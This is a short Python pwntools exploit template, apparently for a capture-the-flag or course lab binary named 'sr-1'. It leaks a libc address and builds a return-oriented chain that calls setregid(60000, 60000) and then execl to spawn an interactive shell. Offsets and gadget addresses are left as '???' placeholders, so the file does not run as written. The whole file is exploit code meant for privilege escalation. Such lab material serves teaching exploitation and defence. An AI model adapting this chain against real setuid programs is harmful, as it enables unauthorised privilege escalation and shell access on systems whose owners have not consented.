from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
e = ELF("./sr-1")
p = process(e.path)

# how much do you want to dump?
offset_to_libc_start_main_240 = b"???"

# parsing recv'd buffer
m = p.recvuntil(b"print?\n")
p.sendline(offset_to_libc_start_main_240)

buf = p.recvuntil("Please")[:-6]
libc240 = u64(buf[-8:])

print(hex(libc240))

execl_offset = ???
execl_addr = libc240 + execl_offset
str_offset =  ???
str_addr = libc240 + str_offset
setregid_offset = ???
setregid_addr = libc240 + setregid_offset

# gadgets

p_rdi_r = ???
p_rsi_r15_r = ???

# padding
exploit = b'a'* 136

#setregid
exploit += p64(p_rdi_r) + p64(60000) + p64(p_rsi_r15_r) + p64(60000) + p64(60000) + p64(setregid_addr)

# execl
exploit += p64(p_rdi_r) + p64(str_addr) + p64(p_rsi_r15_r) + p64(0) + p64(0) + p64(execl_addr)
p.sendline(exploit)
p.interactive()